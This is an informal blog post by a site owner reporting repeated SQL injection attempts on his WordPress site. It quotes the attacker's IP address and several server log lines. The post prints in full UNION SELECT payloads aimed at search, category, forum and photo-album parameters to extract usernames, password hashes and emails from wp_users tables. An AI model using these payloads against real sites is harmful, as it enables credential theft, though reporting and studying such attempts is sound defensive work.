Stupid Site Had it`s first hacking attempt!!

Yes , one stupid son of a bitch tryed to hack us…
But , of course , hes mission was failure
For curious ones , here is hacker`s IP: 91.211.65.25
He is from UK…
And he was trying some sort of SQL Injection …
In search box he typed

1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23

So , if anyone knows this particiluar person ,  please inform him/her that

Just because this site`s name is Stupid Site , it does not mean that I , owner , and admin of this site, am stupid…

Keep trying , you won`t get anywhere

UPDATE:

Wow , looks like this guy was here more than once…

I just checked all my logs searching for his Ip , And this is what i found:

“20090123″,”13:52:22″,”91.211.65.25″,”cat=999%20UNION%20SELECT%20null,CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37)),null,null,null%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090123″,”13:52:24″,”91.211.65.25″,”cat=%2527%20UNION%20SELECT%20CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37))%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:36:53″,”91.211.65.25″,”cat=999%20UNION%20SELECT%20null,CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37)),null,null,null%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:36:55″,”91.211.65.25″,”cat=%2527%20UNION%20SELECT%20CONCAT(char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37))%20FROM%20wp_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:36:56″,”91.211.65.25″,”page_id=115&forumaction=showprofile&user=1+union+select+null,concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37),user_email,char(37),char(95),char(37),char(95),char(37)),null,null,null,null,null+from+wp_tbv_users/*”,”",”",”",”",”",”",”",”",”"

“20090124″,”11:37:05″,”91.211.65.25″,”page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37))/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201″,”",”",”",”",”",”",”",”",”"

“20090127″,”19:38:35″,”91.211.65.25″,”exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**/SELECT/**/1,2,3,4,5,concat(char(37),char(95),char(37),char(95),char(37),user_login,char(37),char(95),char(37),char(95),char(37),user_pass,char(37),char(95),char(37),char(95),char(37)),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23″,”",”",”",”",

In first “” you can find date , and as you can see , he was here on January 23. , 24. and 27. In second “” you can see time , and as you probably noticed by now , time between requests is 1-2 seconds… So , i am guessing that he or she is using some kind of program .LAMER!

Anyway , i think that this is very good way to fight “hackers”. If you just ban them, they will come back with a proxy , but if you put their IP on a front page , they will know they FAILED!

P.S. If anyone knows any UK gov site where i ca nreport this , please post it in comments. (I am tired of googling…)

Delicious Digg This Post Ping This Post Reddit Stumble This Post